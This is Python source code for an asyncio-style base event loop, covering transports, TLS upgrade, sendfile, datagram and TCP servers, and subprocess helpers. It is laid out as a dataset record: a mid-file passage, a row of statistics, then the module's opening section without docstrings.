sock, host, port, transport, protocol)
return transport, protocol
async def _create_connection_transport(
self, sock, protocol_factory, ssl,
server_hostname, server_side=False,
ssl_handshake_timeout=None):
sock.setblocking(False)
protocol = protocol_factory()
waiter = self.create_future()
if ssl:
sslcontext = None if isinstance(ssl, bool) else ssl
transport = self._make_ssl_transport(
sock, protocol, sslcontext, waiter,
server_side=server_side, server_hostname=server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout)
else:
transport = self._make_socket_transport(sock, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def sendfile(self, transport, file, offset=0, count=None,
*, fallback=True):
"""Send a file to transport.
Return the total number of bytes which were sent.
The method uses high-performance os.sendfile if available.
file must be a regular file object opened in binary mode.
offset tells from where to start reading the file. If specified,
count is the total number of bytes to transmit as opposed to
sending the file until EOF is reached. File position is updated on
return or also in case of error in which case file.tell()
can be used to figure out the number of bytes
which were sent.
fallback set to True makes asyncio to manually read and send
the file when the platform does not support the sendfile syscall
(e.g. Windows or SSL socket on Unix).
Raise SendfileNotAvailableError if the system does not support
sendfile syscall and fallback is False.
"""
if transport.is_closing():
raise RuntimeError("Transport is closing")
mode = getattr(transport, '_sendfile_compatible',
constants._SendfileMode.UNSUPPORTED)
if mode is constants._SendfileMode.UNSUPPORTED:
raise RuntimeError(
f"sendfile is not supported for transport {transport!r}")
if mode is constants._SendfileMode.TRY_NATIVE:
try:
return await self._sendfile_native(transport, file,
offset, count)
except events.SendfileNotAvailableError as exc:
if not fallback:
raise
if not fallback:
raise RuntimeError(
f"fallback is disabled and native sendfile is not "
f"supported for transport {transport!r}")
return await self._sendfile_fallback(transport, file,
offset, count)
async def _sendfile_native(self, transp, file, offset, count):
raise events.SendfileNotAvailableError(
"sendfile syscall is not supported")
async def _sendfile_fallback(self, transp, file, offset, count):
if offset:
file.seek(offset)
blocksize = min(count, 16384) if count else 16384
buf = bytearray(blocksize)
total_sent = 0
proto = _SendfileFallbackProtocol(transp)
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
return total_sent
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
return total_sent # EOF
await proto.drain()
transp.write(view[:read])
total_sent += read
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
await proto.restore()
async def start_tls(self, transport, protocol, sslcontext, *,
server_side=False,
server_hostname=None,
ssl_handshake_timeout=None):
"""Upgrade transport to TLS.
Return a new transport that *protocol* should start using
immediately.
"""
if ssl is None:
raise RuntimeError('Python ssl module is not available')
if not isinstance(sslcontext, ssl.SSLContext):
raise TypeError(
f'sslcontext is expected to be an instance of ssl.SSLContext, '
f'got {sslcontext!r}')
if not getattr(transport, '_start_tls_compatible', False):
raise TypeError(
f'transport {transport!r} is not supported by start_tls()')
waiter = self.create_future()
ssl_protocol = sslproto.SSLProtocol(
self, protocol, sslcontext, waiter,
server_side, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout,
call_connection_made=False)
# Pause early so that "ssl_protocol.data_received()" doesn't
# have a chance to get called before "ssl_protocol.connection_made()".
transport.pause_reading()
transport.set_protocol(ssl_protocol)
conmade_cb = self.call_soon(ssl_protocol.connection_made, transport)
resume_cb = self.call_soon(transport.resume_reading)
try:
await waiter
except Exception:
transport.close()
conmade_cb.cancel()
resume_cb.cancel()
raise
return ssl_protocol._app_transport
async def create_datagram_endpoint(self, protocol_factory,
local_addr=None, remote_addr=None, *,
family=0, proto=0, flags=0,
reuse_address=_unset, reuse_port=None,
allow_broadcast=None, sock=None):
"""Create datagram connection."""
if sock is not None:
if sock.type != socket.SOCK_DGRAM:
raise ValueError(
f'A UDP Socket was expected, got {sock!r}')
if (local_addr or remote_addr or
family or proto or flags or
reuse_port or allow_broadcast):
# show the problematic kwargs in exception msg
opts = dict(local_addr=local_addr, remote_addr=remote_addr,
family=family, proto=proto, flags=flags,
reuse_address=reuse_address, reuse_port=reuse_port,
allow_broadcast=allow_broadcast)
problems = ', '.join(f'{k}={v}' for k, v in opts.items() if v)
raise ValueError(
f'socket modifier keyword arguments can not be used '
f'when sock is specified. ({problems})')
sock.setblocking(False)
r_addr = None
else:
if not (local_addr or remote_addr):
if family == 0:
raise ValueError('unexpected address family')
addr_pairs_info = (((family, proto), (None, None)),)
elif hasattr(socket, 'AF_UNIX') and family == socket.AF_UNIX:
for addr in (local_addr, remote_addr):
if addr is not None and not isinstance(addr, str):
raise TypeError('string is expected')
addr_pairs_info = (((family, proto),
(local_addr, remote_addr)), )
else:
# join address by (family, protocol)
addr_infos = collections.OrderedDict()
for idx, addr in ((0, local_addr), (1, remote_addr)):
if addr is not None:
assert isinstance(addr, tuple) and len(addr) == 2, (
'2-tuple is expected')
infos = await self._ensure_resolved(
addr, family=family, type=socket.SOCK_DGRAM,
proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
for fam, _, pro, _, address in infos:
key = (fam, pro)
if key not in addr_infos:
addr_infos[key] = [None, None]
addr_infos[key][idx] = address
# each addr has to have info for each (family, proto) pair
addr_pairs_info = [
(key, addr_pair) for key, addr_pair in addr_infos.items()
if not ((local_addr and addr_pair[0] is None) or
(remote_addr and addr_pair[1] is None))]
if not addr_pairs_info:
raise ValueError('can not get address information')
exceptions = []
# bpo-37228
if reuse_address is not _unset:
if reuse_address:
raise ValueError("Passing `reuse_address=True` is no "
"longer supported, as the usage of "
"SO_REUSEPORT in UDP poses a significant "
"security concern.")
else:
warnings.warn("The *reuse_address* parameter has been "
"deprecated as of 3.7.6 and is scheduled "
"for removal in 3.11.", DeprecationWarning,
stacklevel=2)
for ((family, proto),
(local_address, remote_address)) in addr_pairs_info:
sock = None
r_addr = None
try:
sock = socket.socket(
family=family, type=socket.SOCK_DGRAM, proto=proto)
if reuse_port:
_set_reuseport(sock)
if allow_broadcast:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.setblocking(False)
if local_addr:
sock.bind(local_address)
if remote_addr:
if not allow_broadcast:
await self.sock_connect(sock, remote_address)
r_addr = remote_address
except OSError as exc:
if sock is not None:
sock.close()
exceptions.append(exc)
except:
if sock is not None:
sock.close()
raise
else:
break
else:
raise exceptions[0]
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_datagram_transport(
sock, protocol, r_addr, waiter)
if self._debug:
if local_addr:
logger.info("Datagram endpoint local_addr=%r remote_addr=%r "
"created: (%r, %r)",
local_addr, remote_addr, transport, protocol)
else:
logger.debug("Datagram endpoint remote_addr=%r created: "
"(%r, %r)",
remote_addr, transport, protocol)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def _ensure_resolved(self, address, *,
family=0, type=socket.SOCK_STREAM,
proto=0, flags=0, loop):
host, port = address[:2]
info = _ipaddr_info(host, port, family, type, proto, *address[2:])
if info is not None:
# "host" is already a resolved IP.
return [info]
else:
return await loop.getaddrinfo(host, port, family=family, type=type,
proto=proto, flags=flags)
async def _create_server_getaddrinfo(self, host, port, family, flags):
infos = await self._ensure_resolved((host, port), family=family,
type=socket.SOCK_STREAM,
flags=flags, loop=self)
if not infos:
raise OSError(f'getaddrinfo({host!r}) returned empty list')
return infos
async def create_server(
self, protocol_factory, host=None, port=None,
*,
family=socket.AF_UNSPEC,
flags=socket.AI_PASSIVE,
sock=None,
backlog=100,
ssl=None,
reuse_address=None,
reuse_port=None,
ssl_handshake_timeout=None,
start_serving=True):
"""Create a TCP server.
The host parameter can be a string, in that case the TCP server is
bound to host and port.
The host parameter can also be a sequence of strings and in that case
the TCP server is bound to all hosts of the sequence. If a host
appears multiple times (possibly indirectly e.g. when hostnames
resolve to the same IP address), the server is only bound once to that
host.
Return a Server object which can be used to stop the service.
This method is a coroutine.
"""
if isinstance(ssl, bool):
raise TypeError('ssl argument must be an SSLContext or None')
if ssl_handshake_timeout is not None and ssl is None:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
if reuse_address is None:
reuse_address = os.name == 'posix' and sys.platform != 'cygwin'
sockets = []
if host == '':
hosts = [None]
elif (isinstance(host, str) or
not isinstance(host, collections.abc.Iterable)):
hosts = [host]
else:
hosts = host
fs = [self._create_server_getaddrinfo(host, port, family=family,
flags=flags)
for host in hosts]
infos = await tasks.gather(*fs, loop=self)
infos = set(itertools.chain.from_iterable(infos))
completed = False
try:
for res in infos:
af, socktype, proto, canonname, sa = res
try:
sock = socket.socket(af, socktype, proto)
except socket.error:
# Assume it's a bad family/type/protocol combination.
if self._debug:
logger.warning('create_server() failed to create '
'socket.socket(%r, %r, %r)',
af, socktype, proto, exc_info=True)
continue
sockets.append(sock)
if reuse_address:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
if reuse_port:
_set_reuseport(sock)
# Disable IPv4/IPv6 dual stack support (enabled by
# default on Linux) which makes a single socket
# listen on both address families.
if (_HAS_IPv6 and
af == socket.AF_INET6 and
hasattr(socket, 'IPPROTO_IPV6')):
sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_V6ONLY,
True)
try:
sock.bind(sa)
except OSError as err:
raise OSError(err.errno, 'error while attempting '
'to bind on address %r: %s'
% (sa, err.strerror.lower())) from None
completed = True
finally:
if not completed:
for sock in sockets:
sock.close()
else:
if sock is None:
raise ValueError('Neither host/port nor sock were specified')
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
sockets = [sock]
for sock in sockets:
sock.setblocking(False)
server = Server(self, sockets, protocol_factory,
ssl, backlog, ssl_handshake_timeout)
if start_serving:
server._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0, loop=self)
if self._debug:
logger.info("%r is serving", server)
return server
async def connect_accepted_socket(
self, protocol_factory, sock,
*, ssl=None,
ssl_handshake_timeout=None):
"""Handle an accepted connection.
This is used by servers that accept connections outside of
asyncio but that use asyncio to handle connections.
This method is a coroutine. When completed, the coroutine
returns a (transport, protocol) pair.
"""
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, '', server_side=True,
ssl_handshake_timeout=ssl_handshake_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r handled: (%r, %r)", sock, transport, protocol)
return transport, protocol
async def connect_read_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_read_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Read pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
async def connect_write_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_write_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Write pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
def _log_subprocess(self, msg, stdin, stdout, stderr):
info = [msg]
if stdin is not None:
info.append(f'stdin={_format_pipe(stdin)}')
if stdout is not None and stderr == subprocess.STDOUT:
info.append(f'stdout=stderr={_format_pipe(stdout)}')
else:
if stdout is not None:
info.append(f'stdout={_format_pipe(stdout)}')
if stderr is not None:
info.append(f'stderr={_format_pipe(stderr)}')
logger.debug(' '.join(info))
async def subprocess_shell(self, protocol_factory, cmd, *,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=False,
shell=True, bufsize=0,
**kwargs):
if not isinstance(cmd, (bytes, str)):
raise ValueError("cmd must be a string")
if universal_newlines:
raise ValueError("universal_newlines must be False")
if not shell:
raise ValueError("shell must be True")
if bufsize != 0:
raise ValueError("bufsize must be 0")
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = 'run shell command %r' % cmd
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, cmd, True, stdin, stdout, stderr, bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
async def subprocess_exec(self, protocol_factory, program, *args,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=False,
shell=False, bufsize=0, **kwargs):
if universal_newlines:
raise ValueError("universal_newlines must be False")
if shell:
raise ValueError("shell must be False")
if bufsize != 0:
raise ValueError("bufsize must be 0")
popen_args = (program,) + args
for arg in popen_args:
if not isinstance(arg, (str, bytes)):
raise TypeError(
f"program arguments must be a bytes or text string, "
f"not {type(arg).__name__}")
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = f'execute program {program!r}'
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, popen_args, False, stdin, stdout, stderr,
bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
def get_exception_handler(self):
"""Return an exception handler, or None if the default one is in use.
"""
return self._exception_handler
def set_exception_handler(self, handler):
"""Set handler as the new event loop exception handler.
If handler is None, the default exception handler will
be set.
If handler is a callable object, it should have a
signature matching '(loop, context)', where 'loop'
will be a reference to the active event loop, 'context'
will be a dict object (see `call_exception_handler()`
documentation for details about context).
"""
if handler is not None and not callable(handler):
raise TypeError(f'A callable object or None is expected, '
f'got {handler!r}')
self._exception_handler = handler
def default_exception_handler(self, context):
"""Default exception handler.
This is called when an exception occurs and no exception
handler is set, and can be called by a custom exception
handler that wants to defer to the default behavior.
This default handler logs the error message and other
context-dependent information. In debug mode, a truncated
stack trace is also appended showing where the given object
(e.g. a handle or future or task) was created, if any.
The context parameter has the same meaning as in
`call_exception_handler()`.
"""
message = context.get('message')
if not message:
message = 'Unhandled exception in event loop'
exception = context.get('exception')
if exception is not None:
exc_info = (type(exception), exception, exception.__traceback__)
else:
exc_info = False
if ('source_traceback' not in context and
self._current_handle is not None and
self._current_handle._source_traceback):
context['handle_traceback'] = \
self._current_handle._source_traceback
log_lines = [message]
for key in sorted(context):
if key in {'message', 'exception'}:
continue
value = context[key]
if key == 'source_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Object created at (most recent call last):\n'
value += tb.rstrip()
elif key == 'handle_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Handle created at (most recent call last):\n'
value += tb.rstrip()
else:
value = repr(value)
log_lines.append(f'{key}: {value}')
logger.error('\n'.join(log_lines), exc_info=exc_info)
def call_exception_handler(self, context):
"""Call the current event loop's exception handler.
The context argument is a dict containing the following keys:
- 'message': Error message;
- 'exception' (optional): Exception object;
- 'future' (optional): Future instance;
- 'task' (optional): Task instance;
- 'handle' (optional): Handle instance;
- 'protocol' (optional): Protocol instance;
- 'transport' (optional): Transport instance;
- 'socket' (optional): Socket instance;
- 'asyncgen' (optional): Asynchronous generator that caused
the exception.
New keys maybe introduced in the future.
Note: do not overload this method in an event loop subclass.
For custom exception handling, use the
`set_exception_handler()` method.
"""
if self._exception_handler is None:
try:
self.default_exception_handler(context)
except Exception:
# Second protection layer for unexpected errors
# in the default implementation, as well as for subclassed
# event loops with overloaded "default_exception_handler".
logger.error('Exception in default exception handler',
exc_info=True)
else:
try:
self._exception_handler(self, context)
except Exception as exc:
# Exception in the user set custom exception handler.
try:
# Let's try default handler.
self.default_exception_handler({
'message': 'Unhandled error in exception handler',
'exception': exc,
'context': context,
})
except Exception:
# Guard 'default_exception_handler' in case it is
# overloaded.
logger.error('Exception in default exception handler '
'while handling an unexpected error '
'in custom exception handler',
exc_info=True)
def _add_callback(self, handle):
"""Add a Handle to _scheduled (TimerHandle) or _ready."""
assert isinstance(handle, events.Handle), 'A Handle is required here'
if handle._cancelled:
return
assert not isinstance(handle, events.TimerHandle)
self._ready.append(handle)
def _add_callback_signalsafe(self, handle):
"""Like _add_callback() but called from a signal handler."""
self._add_callback(handle)
self._write_to_self()
def _timer_handle_cancelled(self, handle):
"""Notification that a TimerHandle has been cancelled."""
if handle._scheduled:
self._timer_cancelled_count += 1
def _run_once(self):
"""Run one full iteration of the event loop.
This calls all currently ready callbacks, polls for I/O,
schedules the resulting callbacks, and finally schedules
'call_later' callbacks.
"""
sched_count = len(self._scheduled)
if (sched_count > _MIN_SCHEDULED_TIMER_HANDLES and
self._timer_cancelled_count / sched_count >
_MIN_CANCELLED_TIMER_HANDLES_FRACTION):
# Remove delayed calls that were cancelled if their number
# is too high
new_scheduled = []
for handle in self._scheduled:
if handle._cancelled:
handle._scheduled = False
else:
new_scheduled.append(handle)
heapq.heapify(new_scheduled)
self._scheduled = new_scheduled
self._timer_cancelled_count = 0
else:
# Remove delayed calls that were cancelled from head of queue.
while self._scheduled and self._scheduled[0]._cancelled:
self._timer_cancelled_count -= 1
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
timeout = None
if self._ready or self._stopping:
timeout = 0
elif self._scheduled:
# Compute the desired timeout.
when = self._scheduled[0]._when
timeout = min(max(0, when - self.time()), MAXIMUM_SELECT_TIMEOUT)
if self._debug and timeout != 0:
t0 = self.time()
event_list = self._selector.select(timeout)
dt = self.time() - t0
if dt >= 1.0:
level = logging.INFO
else:
level = logging.DEBUG
nevent = len(event_list)
if timeout is None:
logger.log(level, 'poll took %.3f ms: %s events',
dt * 1e3, nevent)
elif nevent:
logger.log(level,
'poll %.3f ms took %.3f ms: %s events',
timeout * 1e3, dt * 1e3, nevent)
elif dt >= 1.0:
logger.log(level,
'poll %.3f ms took %.3f ms: timeout',
timeout * 1e3, dt * 1e3)
else:
event_list = self._selector.select(timeout)
self._process_events(event_list)
# Handle 'later' callbacks that are ready.
end_time = self.time() + self._clock_resolution
while self._scheduled:
handle = self._scheduled[0]
if handle._when >= end_time:
break
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
self._ready.append(handle)
# This is the only place where callbacks are actually *called*.
# All other places just add them to ready.
# Note: We run all currently scheduled callbacks, but not any
# callbacks scheduled by callbacks run this time around --
# they will be run the next time (after another I/O poll).
# Use an idiom that is thread-safe without using locks.
ntodo = len(self._ready)
for i in range(ntodo):
handle = self._ready.popleft()
if handle._cancelled:
continue
if self._debug:
try:
self._current_handle = handle
t0 = self.time()
handle._run()
dt = self.time() - t0
if dt >= self.slow_callback_duration:
logger.warning('Executing %s took %.3f seconds',
_format_handle(handle), dt)
finally:
self._current_handle = None
else:
handle._run()
handle = None # Needed to break cycles when an exception occurs.
def _set_coroutine_origin_tracking(self, enabled):
if bool(enabled) == bool(self._coroutine_origin_tracking_enabled):
return
if enabled:
self._coroutine_origin_tracking_saved_depth = (
sys.get_coroutine_origin_tracking_depth())
sys.set_coroutine_origin_tracking_depth(
constants.DEBUG_STACK_DEPTH)
else:
sys.set_coroutine_origin_tracking_depth(
self._coroutine_origin_tracking_saved_depth)
self._coroutine_origin_tracking_enabled = enabled
def get_debug(self):
return self._debug
def set_debug(self, enabled):
self._debug = enabled
if self.is_running():
self.call_soon_threadsafe(self._set_coroutine_origin_tracking, enabled)
| 38.537528 | 83 | 0.568609 |
import collections
import collections.abc
import concurrent.futures
import heapq
import itertools
import logging
import os
import socket
import subprocess
import threading
import time
import traceback
import sys
import warnings
import weakref
try:
import ssl
except ImportError:
ssl = None
from . import constants
from . import coroutines
from . import events
from . import futures
from . import protocols
from . import sslproto
from . import tasks
from . import transports
from .log import logger
__all__ = 'BaseEventLoop',
_MIN_SCHEDULED_TIMER_HANDLES = 100
_MIN_CANCELLED_TIMER_HANDLES_FRACTION = 0.5
_HAS_IPv6 = hasattr(socket, 'AF_INET6')
MAXIMUM_SELECT_TIMEOUT = 24 * 3600
# *reuse_address* parameter
_unset = object()
def _format_handle(handle):
cb = handle._callback
if isinstance(getattr(cb, '__self__', None), tasks.Task):
# format the task
return repr(cb.__self__)
else:
return str(handle)
def _format_pipe(fd):
if fd == subprocess.PIPE:
return '<pipe>'
elif fd == subprocess.STDOUT:
return '<stdout>'
else:
return repr(fd)
def _set_reuseport(sock):
if not hasattr(socket, 'SO_REUSEPORT'):
raise ValueError('reuse_port not supported by socket module')
else:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except OSError:
raise ValueError('reuse_port not supported by socket module, '
'SO_REUSEPORT defined but not implemented.')
def _ipaddr_info(host, port, family, type, proto, flowinfo=0, scopeid=0):
# Try to skip getaddrinfo if "host" is already an IP. Users might have
# handled name resolution in their own code and pass in resolved IPs.
if not hasattr(socket, 'inet_pton'):
return
if proto not in {0, socket.IPPROTO_TCP, socket.IPPROTO_UDP} or \
host is None:
return None
if type == socket.SOCK_STREAM:
proto = socket.IPPROTO_TCP
elif type == socket.SOCK_DGRAM:
proto = socket.IPPROTO_UDP
else:
return None
if port is None:
port = 0
elif isinstance(port, bytes) and port == b'':
port = 0
elif isinstance(port, str) and port == '':
port = 0
else:
# If port's a service name like "http", don't skip getaddrinfo.
try:
port = int(port)
except (TypeError, ValueError):
return None
if family == socket.AF_UNSPEC:
afs = [socket.AF_INET]
if _HAS_IPv6:
afs.append(socket.AF_INET6)
else:
afs = [family]
if isinstance(host, bytes):
host = host.decode('idna')
if '%' in host:
# Linux's inet_pton doesn't accept an IPv6 zone index after host,
# like '::1%lo0'.
return None
for af in afs:
try:
socket.inet_pton(af, host)
# The host has already been resolved.
if _HAS_IPv6 and af == socket.AF_INET6:
return af, type, proto, '', (host, port, flowinfo, scopeid)
else:
return af, type, proto, '', (host, port)
except OSError:
pass
# "host" is not an IP address.
return None
def _run_until_complete_cb(fut):
if not fut.cancelled():
exc = fut.exception()
if isinstance(exc, BaseException) and not isinstance(exc, Exception):
# Issue #22429: run_forever() already finished, no need to
# stop it.
return
futures._get_loop(fut).stop()
if hasattr(socket, 'TCP_NODELAY'):
def _set_nodelay(sock):
if (sock.family in {socket.AF_INET, socket.AF_INET6} and
sock.type == socket.SOCK_STREAM and
sock.proto == socket.IPPROTO_TCP):
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
else:
def _set_nodelay(sock):
pass
class _SendfileFallbackProtocol(protocols.Protocol):
def __init__(self, transp):
if not isinstance(transp, transports._FlowControlMixin):
raise TypeError("transport should be _FlowControlMixin instance")
self._transport = transp
self._proto = transp.get_protocol()
self._should_resume_reading = transp.is_reading()
self._should_resume_writing = transp._protocol_paused
transp.pause_reading()
transp.set_protocol(self)
if self._should_resume_writing:
self._write_ready_fut = self._transport._loop.create_future()
else:
self._write_ready_fut = None
async def drain(self):
if self._transport.is_closing():
raise ConnectionError("Connection closed by peer")
fut = self._write_ready_fut
if fut is None:
return
await fut
def connection_made(self, transport):
raise RuntimeError("Invalid state: "
"connection should have been established already.")
def connection_lost(self, exc):
if self._write_ready_fut is not None:
# Never happens if peer disconnects after sending the whole content
# Thus disconnection is always an exception from user perspective
if exc is None:
self._write_ready_fut.set_exception(
ConnectionError("Connection is closed by peer"))
else:
self._write_ready_fut.set_exception(exc)
self._proto.connection_lost(exc)
def pause_writing(self):
if self._write_ready_fut is not None:
return
self._write_ready_fut = self._transport._loop.create_future()
def resume_writing(self):
if self._write_ready_fut is None:
return
self._write_ready_fut.set_result(False)
self._write_ready_fut = None
def data_received(self, data):
raise RuntimeError("Invalid state: reading should be paused")
def eof_received(self):
raise RuntimeError("Invalid state: reading should be paused")
async def restore(self):
self._transport.set_protocol(self._proto)
if self._should_resume_reading:
self._transport.resume_reading()
if self._write_ready_fut is not None:
# Cancel the future.
# Basically it has no effect because protocol is switched back,
# no code should wait for it anymore.
self._write_ready_fut.cancel()
if self._should_resume_writing:
self._proto.resume_writing()
class Server(events.AbstractServer):
def __init__(self, loop, sockets, protocol_factory, ssl_context, backlog,
ssl_handshake_timeout):
self._loop = loop
self._sockets = sockets
self._active_count = 0
self._waiters = []
self._protocol_factory = protocol_factory
self._backlog = backlog
self._ssl_context = ssl_context
self._ssl_handshake_timeout = ssl_handshake_timeout
self._serving = False
self._serving_forever_fut = None
def __repr__(self):
return f'<{self.__class__.__name__} sockets={self.sockets!r}>'
def _attach(self):
assert self._sockets is not None
self._active_count += 1
def _detach(self):
assert self._active_count > 0
self._active_count -= 1
if self._active_count == 0 and self._sockets is None:
self._wakeup()
def _wakeup(self):
waiters = self._waiters
self._waiters = None
for waiter in waiters:
if not waiter.done():
waiter.set_result(waiter)
def _start_serving(self):
if self._serving:
return
self._serving = True
for sock in self._sockets:
sock.listen(self._backlog)
self._loop._start_serving(
self._protocol_factory, sock, self._ssl_context,
self, self._backlog, self._ssl_handshake_timeout)
def get_loop(self):
return self._loop
def is_serving(self):
return self._serving
@property
def sockets(self):
if self._sockets is None:
return []
return list(self._sockets)
def close(self):
sockets = self._sockets
if sockets is None:
return
self._sockets = None
for sock in sockets:
self._loop._stop_serving(sock)
self._serving = False
if (self._serving_forever_fut is not None and
not self._serving_forever_fut.done()):
self._serving_forever_fut.cancel()
self._serving_forever_fut = None
if self._active_count == 0:
self._wakeup()
async def start_serving(self):
self._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0, loop=self._loop)
async def serve_forever(self):
if self._serving_forever_fut is not None:
raise RuntimeError(
f'server {self!r} is already being awaited on serve_forever()')
if self._sockets is None:
raise RuntimeError(f'server {self!r} is closed')
self._start_serving()
self._serving_forever_fut = self._loop.create_future()
try:
await self._serving_forever_fut
except futures.CancelledError:
try:
self.close()
await self.wait_closed()
finally:
raise
finally:
self._serving_forever_fut = None
async def wait_closed(self):
if self._sockets is None or self._waiters is None:
return
waiter = self._loop.create_future()
self._waiters.append(waiter)
await waiter
class BaseEventLoop(events.AbstractEventLoop):
def __init__(self):
self._timer_cancelled_count = 0
self._closed = False
self._stopping = False
self._ready = collections.deque()
self._scheduled = []
self._default_executor = None
self._internal_fds = 0
# Identifier of the thread running the event loop, or None if the
# event loop is not running
self._thread_id = None
self._clock_resolution = time.get_clock_info('monotonic').resolution
self._exception_handler = None
self.set_debug(coroutines._is_debug_mode())
# In debug mode, if the execution of a callback or a step of a task
# exceed this duration in seconds, the slow callback/task is logged.
self.slow_callback_duration = 0.1
self._current_handle = None
self._task_factory = None
self._coroutine_origin_tracking_enabled = False
self._coroutine_origin_tracking_saved_depth = None
# A weak set of all asynchronous generators that are
# being iterated by the loop.
self._asyncgens = weakref.WeakSet()
# Set to True when `loop.shutdown_asyncgens` is called.
self._asyncgens_shutdown_called = False
def __repr__(self):
return (
f'<{self.__class__.__name__} running={self.is_running()} '
f'closed={self.is_closed()} debug={self.get_debug()}>'
)
def create_future(self):
return futures.Future(loop=self)
def create_task(self, coro):
self._check_closed()
if self._task_factory is None:
task = tasks.Task(coro, loop=self)
if task._source_traceback:
del task._source_traceback[-1]
else:
task = self._task_factory(self, coro)
return task
def set_task_factory(self, factory):
if factory is not None and not callable(factory):
raise TypeError('task factory must be a callable or None')
self._task_factory = factory
def get_task_factory(self):
return self._task_factory
def _make_socket_transport(self, sock, protocol, waiter=None, *,
extra=None, server=None):
raise NotImplementedError
def _make_ssl_transport(
self, rawsock, protocol, sslcontext, waiter=None,
*, server_side=False, server_hostname=None,
extra=None, server=None,
ssl_handshake_timeout=None,
call_connection_made=True):
raise NotImplementedError
def _make_datagram_transport(self, sock, protocol,
address=None, waiter=None, extra=None):
raise NotImplementedError
def _make_read_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
raise NotImplementedError
def _make_write_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
raise NotImplementedError
async def _make_subprocess_transport(self, protocol, args, shell,
stdin, stdout, stderr, bufsize,
extra=None, **kwargs):
raise NotImplementedError
def _write_to_self(self):
raise NotImplementedError
def _process_events(self, event_list):
raise NotImplementedError
def _check_closed(self):
if self._closed:
raise RuntimeError('Event loop is closed')
def _asyncgen_finalizer_hook(self, agen):
self._asyncgens.discard(agen)
if not self.is_closed():
self.call_soon_threadsafe(self.create_task, agen.aclose())
def _asyncgen_firstiter_hook(self, agen):
if self._asyncgens_shutdown_called:
warnings.warn(
f"asynchronous generator {agen!r} was scheduled after "
f"loop.shutdown_asyncgens() call",
ResourceWarning, source=self)
self._asyncgens.add(agen)
async def shutdown_asyncgens(self):
self._asyncgens_shutdown_called = True
if not len(self._asyncgens):
# If Python version is <3.6 or we don't have any asynchronous
return
closing_agens = list(self._asyncgens)
self._asyncgens.clear()
results = await tasks.gather(
*[ag.aclose() for ag in closing_agens],
return_exceptions=True,
loop=self)
for result, agen in zip(results, closing_agens):
if isinstance(result, Exception):
self.call_exception_handler({
'message': f'an error occurred during closing of '
f'asynchronous generator {agen!r}',
'exception': result,
'asyncgen': agen
})
def _check_runnung(self):
if self.is_running():
raise RuntimeError('This event loop is already running')
if events._get_running_loop() is not None:
raise RuntimeError(
'Cannot run the event loop while another loop is running')
def run_forever(self):
self._check_closed()
self._check_runnung()
self._set_coroutine_origin_tracking(self._debug)
self._thread_id = threading.get_ident()
old_agen_hooks = sys.get_asyncgen_hooks()
sys.set_asyncgen_hooks(firstiter=self._asyncgen_firstiter_hook,
finalizer=self._asyncgen_finalizer_hook)
try:
events._set_running_loop(self)
while True:
self._run_once()
if self._stopping:
break
finally:
self._stopping = False
self._thread_id = None
events._set_running_loop(None)
self._set_coroutine_origin_tracking(False)
sys.set_asyncgen_hooks(*old_agen_hooks)
def run_until_complete(self, future):
self._check_closed()
self._check_runnung()
new_task = not futures.isfuture(future)
